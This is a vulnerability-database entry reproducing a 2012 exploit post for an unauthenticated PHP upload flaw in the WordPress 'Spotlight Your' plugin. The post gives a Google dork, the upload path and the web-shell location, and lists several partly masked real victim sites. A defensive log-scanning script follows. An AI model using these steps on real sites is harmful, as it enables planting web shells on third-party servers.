Wordpress Plugins Spotlight Your Upload Vulnerability

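Vulnerability ID 1046119 Vulnerability type
Published 2012-11-18 Updated 2012-11-18
CVE ID N/A CNNVD-ID N/A
Affected platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2012110121
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit (EXP)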
INDO-PENDENT HACKER
http://thecrowscrew.org
###########################
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.com
###########################
 
[+] POC
 
Exp. Target :
- http://domain.com/wp-content/plugins/spotlightyour/
 
Exploit :
- /monetize/upload/index.php
 
Shell Access : 
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php
 
Ending :
- Fraksi Bejoug a.k.a Kalam Saheru
Saparatoss Blank Blank
awkwkwkwk :v
 
http://beautXXXo.com/wp-content/plugins/spotlightyour/monetize/upload/
 
http://www.XXXotion.com/wp-content/plugins/spotlightyour/monetize/upload/
 
http://sXXXXinister.com/wp-content/plugins/spotlightyour/monetize/upload/
 
###########################

Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, -=[The Crows Crew]=-, Indonesian Hacker
 
thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
 
###[end]###
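
A defender's check for the request pattern in the PoC above, as an added example that is not part of the original advisory: it scans web server access logs for requests to the plugin's upload handler and for PHP files requested under the dated uploads tree. The combined log format, the function name `scan`, the labels and the sample lines are assumptions constructed for illustration.

```python
import re

# Apache/nginx "combined" access log line (assumed format).
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
# Upload handler path given in the advisory.
UPLOAD_RE = re.compile(
    r'/wp-content/plugins/spotlightyour/monetize/upload/(?:index\.php)?(?:\?|$)', re.I)
# Any PHP file directly under the dated uploads tree given in the advisory.
PHP_RE = re.compile(r'/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.php(?:\?|$)', re.I)

def scan(lines):
    """Return (label, ip, method, path, status) findings in log order."""
    uploaders = set()   # clients that POSTed to the upload handler
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue    # not in the expected format
        ip, method, path, status = m[1], m[2], m[3], int(m[4])
        if UPLOAD_RE.search(path):
            label = "upload-post" if method == "POST" else "upload-probe"
            if method == "POST":
                uploaders.add(ip)
        elif PHP_RE.search(path):
            if status != 200:
                label = "php-probe"            # request did not return 200
            elif ip in uploaders:
                label = "php-after-upload"     # same client uploaded earlier
            else:
                label = "php-in-uploads"       # PHP served from a media directory
        else:
            continue
        findings.append((label, ip, method, path, status))
    return findings

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Nov/2012:10:00:01 +0000] "GET /wp-content/plugins/spotlightyour/monetize/upload/ HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [18/Nov/2012:10:00:09 +0000] "POST /wp-content/plugins/spotlightyour/monetize/upload/index.php HTTP/1.1" 200 87 "-" "-"',
    '198.51.100.7 - - [18/Nov/2012:10:00:15 +0000] "GET /wp-content/uploads/2012/11/a.php HTTP/1.1" 200 20 "-" "-"',
    '192.0.2.10 - - [18/Nov/2012:10:01:00 +0000] "GET /wp-content/uploads/2012/11/photo.jpg HTTP/1.1" 200 9000 "-" "-"',
    '192.0.2.44 - - [18/Nov/2012:10:02:00 +0000] "GET /wp-content/uploads/2012/10/b.php HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A `php-after-upload` or `php-in-uploads` finding means the server returned 200 for a PHP file in a directory that should hold only media, which warrants inspecting that file on disk.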